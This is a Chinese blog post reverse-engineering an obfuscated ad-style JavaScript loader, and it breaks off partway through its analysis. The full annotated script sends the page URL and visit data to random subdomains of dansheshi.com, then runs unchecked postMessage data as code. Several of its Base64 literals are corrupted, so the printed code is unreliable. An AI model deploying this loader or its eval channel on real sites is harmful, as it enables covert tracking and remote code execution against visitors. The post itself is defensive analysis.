一个冷门的js加密逆向分析(二)

一个冷门的js加密逆向分析(二)_第1张图片
前天发了一篇js加密分析的文章,今天继续来说第二层加密是什么样的。

上源代码

// Second-layer loader: defines window.f3206b1 (the name is assembled from
// single-character pieces) and calls it immediately at the bottom.
// The body is an IIFE that receives (base64 host pattern, space id, window, document).
window["" + "f" + "3" + "2" + "0" + "6" + "b" + "1" + ""] = function () {
    // v509de  : base64 host pattern ("Ki5kYW5zaGVzaGkuY29t" below)
    // m27adb  : ad-space id ("60239125016645" below)
    // me846d07: window
    // w4656a  : document
    ;(function (v509de, m27adb, me846d07, w4656a) {
        // Desktop bail-out. Note the alternation: this matches "Mac" at the start
        // OR "Win" anywhere in navigator.platform (no anchor on the second branch).
        if (/^Mac|Win/.test(navigator.platform)) {
            return
        }
        // Char-code -> single character; used to spell property names without literals.
        ;var xfbe733b = function (e2d163) {
            return String.fromCharCode(e2d163)
        };
        // Static tracking fields sent with every request (type, version, space id, build date, system).
        var eecec = ["t-1", "v-19", "u-60239125016645", "d-2024-02-04 00:15:01", "sys-zc"];
        // 0x61 0x74 0x6F 0x62 spell "atob"; reversed order spells "btoa".
        // p46fa13 = window.atob, t0f122a95 = window.btoa.
        // NOTE(review): each of the Base64 literals below except the host pattern
        // appears to carry one stray character (e.g. "cmVwwbGFjZQ==" vs "cmVwbGFjZQ=="
        // = "replace", "c3Vic3ReyaW5n" vs "c3Vic3RyaW5n" = "substring"); a plain atob
        // would not decode them cleanly, so presumably an earlier layer strips that
        // character or wraps atob — confirm against the first-layer code.
        // Intended names, going by the corrected decodings: currentScript,
        // createElement, substring, replace, split, reverse, join, random, Math, load.
        var p46fa13 = me846d07[xfbe733b(0x61) + xfbe733b(0x74) + xfbe733b(0x6F) + xfbe733b(0x62)],
            t0f122a95 = me846d07[xfbe733b(0x62) + xfbe733b(0x74) + xfbe733b(0x6F) + xfbe733b(0x61)],
            m80ca1 = w4656a[p46fa13("Y3Vycm3VudFNjcmlwdA==")], iea784a99 = p46fa13("Y3JlYXRlRWxlbWVudA=="),
            r78e9d6d = p46fa13("c3Vic3ReyaW5n"), m4934 = p46fa13("cmVwwbGFjZQ=="), z8acdd2e = p46fa13("c3BsaXQ="),
            tbe47d4 = p46fa13("cmV2ZXJszZQ=="), df4b03a = p46fa13("ame9pbg=="), fbb96d36 = p46fa13("cmFuZG9t"),
            c19db4e = me846d07[p46fa13("TWFe0aA==")], z43a1d0 = p46fa13("bG9hwZA==");
        // Debug switch: presumably decodes to "zcdebug" (same stray-character caveat).
        var d652c518b = p46fa13("emNkdZWJ1Zw==");
        // Debug log panel; stays undefined unless the query string contains the switch.
        var t3efa0c8c;
        if (location.search.indexOf(d652c518b) > -1) {
            // Creates a disabled, full-width <textarea> (presumably "textarea") as an on-page log.
            t3efa0c8c = w4656a[iea784a99](p46fa13("dGV4ddGFyZWE="));
            t3efa0c8c.id = "t" + (c19db4e[fbb96d36]() * 10000);
            t3efa0c8c.style.width = "100%";
            t3efa0c8c.style.height = "500px";
            t3efa0c8c.disabled = true;
            if (w4656a.body != null) {
                w4656a.body.appendChild(t3efa0c8c)
            } else {
                // <body> not parsed yet: defer the append to the "load" event and unregister afterwards.
                var ed92204 = function () {
                    w4656a.body.appendChild(t3efa0c8c);
                    me846d07.removeEventListener(z43a1d0, ed92204, false)
                };
                me846d07.addEventListener(z43a1d0, ed92204, false)
            }
        }
        // Zero-height element (presumably "embed") that carries the tracking request;
        // its id is the space id plus a random 0..10000 suffix.
        var f5d56ca77 = w4656a[iea784a99](p46fa13("ZW1iZfWQ="));
        f5d56ca77.style.height = "0px";
        f5d56ca77.id = m27adb + (c19db4e.ceil(c19db4e[fbb96d36]() * 10000));
        // Builds the request path and injects the embed element.
        // k4b38d864: already-resolved host name (see me9d499 below).
        var d155a = function (k4b38d864) {
            var p71eb = new Date();
            // Per-space, per-day counter kept in localStorage; key uses the locale date string.
            var n2a43cae4 = `advSpaceId_${m27adb}_${p71eb.toLocaleDateString()}`;
            var kd7c5922 = JSON.parse(localStorage.getItem(n2a43cae4));
            if (kd7c5922 == null) {
                kd7c5922 = {browserCount: 0}
            }
            // Incremented in memory only; the updated value is never written back here.
            kd7c5922.browserCount++;
            // Payload = btoa( shuffle(static fields + timestamp + page URL + visit count).join(",") ).
            // The shuffle uses sort() with a random comparator, so field order varies per call.
            var g2853c = t0f122a95(eecec.concat([Date["now"](), location.href, `hsc-${kd7c5922.browserCount}`]).sort(() => c19db4e[fbb96d36]() - 0.5)[df4b03a](","));
            // 0x3d is "=": cut off the Base64 padding, reverse the remaining characters,
            // then re-attach the padding. The receiving side has to undo this before decoding.
            var hb14cd75 = g2853c.indexOf(xfbe733b(0x3d)) > -1 ? g2853c[r78e9d6d](g2853c.indexOf(xfbe733b(0x3d))) : "";
            g2853c = g2853c[m4934](hb14cd75, "")[z8acdd2e]("")[tbe47d4]()[df4b03a]("") + hb14cd75;
            // Beacon URL: https://<host>/<obfuscated payload>
            f5d56ca77.src = ["https://", k4b38d864, g2853c][df4b03a]("/");
            w4656a.body.appendChild(f5d56ca77);
            if (t3efa0c8c != null) {
                t3efa0c8c.value += "\\r\\nappended em to html";
                var r525dbdda = w4656a.getElementById(f5d56ca77.id);
                if (r525dbdda == null || r525dbdda == undefined) {
                    t3efa0c8c.value += "\\r\\n cant get em from html"
                }
            }
        };
        if (t3efa0c8c != null) {
            t3efa0c8c.value += "\\r\\nsend js host " + v509de
        }
        // Resolves the host: atob(pattern) decodes to "*.dansheshi.com"; the first "*" (0x2A)
        // is replaced with a random base-36 fragment, yielding a fresh random subdomain
        // on each load (a domain-fronting/evasion pattern worth watching for in DNS logs).
        var me9d499 = function (p345e74a9) {
            return p46fa13(p345e74a9)[m4934](xfbe733b(0x2A), c19db4e[fbb96d36]().toString(36).slice(c19db4e.floor(c19db4e[fbb96d36]() * 9) + 2))
        };
        d155a(me9d499(v509de));
        // Reply channel: the embedded document posts a message back to this window.
        // SECURITY: the handler never checks e.origin or e.source — any window able to
        // postMessage here and guess the public space id (e.data.k, loosely compared with ==)
        // gets its e.data.q string executed as code via new Function. Defenders should
        // treat this as arbitrary remote code execution in the host page's origin.
        me846d07["addEventListener"]("message", function (e) {
            if (e.data.k == m27adb) {
                // Tear down the beacon element, then run the returned code with
                // args = { _tdcs: document.currentScript, _tra: debug textarea or undefined }.
                w4656a.getElementById(f5d56ca77.id).remove();
                if (t3efa0c8c != null) {
                    t3efa0c8c.value += "\\r\\nreceive em post message";
                    t3efa0c8c.value += "\\r\\ne.data.v " + e.data.q
                }
                new Function("args", e.data.q)({_tdcs: m80ca1, _tra: t3efa0c8c})
            }
        })
    })("Ki5kYW5zaGVzaGkuY29t", "60239125016645", window, document)
};
// Runs the loader as soon as the script is evaluated.
f3206b1()

业务分析仅本人猜测,不代表其实际意义

这段代码看起来像是一个广告脚本,它的主要功能是在用户的浏览器中插入一个隐藏的元素,然后加载一个特定的广告。这里是一些关键点:

  1. 代码首先检查用户的平台是否为Mac或Windows,如果是,则不执行任何操作。
  2. 定义了一些变量和函数,包括一些用于字符串操作和随机数生成的函数。
  3. 如果URL查询参数中包含特定的字符串("emNkdZWJ1Zw=="的Base64解码结果),则在页面上创建一个禁用的